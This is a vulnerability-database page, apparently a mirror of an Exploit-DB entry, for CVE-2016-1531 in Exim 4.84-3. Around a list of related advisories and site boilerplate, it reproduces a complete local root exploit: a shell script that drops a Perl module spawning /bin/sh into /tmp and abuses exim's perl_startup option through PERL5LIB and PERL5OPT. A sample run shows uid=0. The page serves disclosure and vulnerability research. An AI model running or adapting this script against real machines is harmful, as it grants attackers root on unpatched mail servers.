Lucene search
K

Exim 4.84-3 - Local Privilege Escalation

🗓️ 09 Mar 2016 00:00:00Reported by Hacker FantasticType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 234 Views

Exim 4.84-3 local privilege escalation via CVE-2016-153

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Exim 4.84-3 - Privilege Escalation
9 Mar 201600:00
zdt
0day.today
Exim < 4.86.2 - Privilege Escalation
10 Mar 201600:00
zdt
0day.today
Exim - 'perl_startup' Privilege Escalation (Metasploit)
15 Apr 201600:00
zdt
FreeBSD
exim -- local privillege escalation
26 Feb 201600:00
freebsd
ArchLinux
exim: privilege escalation
10 Mar 201600:00
archlinux
Circl
CVE-2016-1531
9 Mar 201600:00
circl
CNVD
Exim Configuration File Path Elevation of Privilege Vulnerability
7 Mar 201600:00
cnvd
CVE
CVE-2016-1531
7 Apr 201623:00
cve
Cvelist
CVE-2016-1531
7 Apr 201623:00
cvelist
Debian
[SECURITY] [DSA 3517-1] exim4 security update
14 Mar 201605:48
debian
Rows per page
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Mar 2016 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 26.9
CVSS 37
EPSS0.5677
234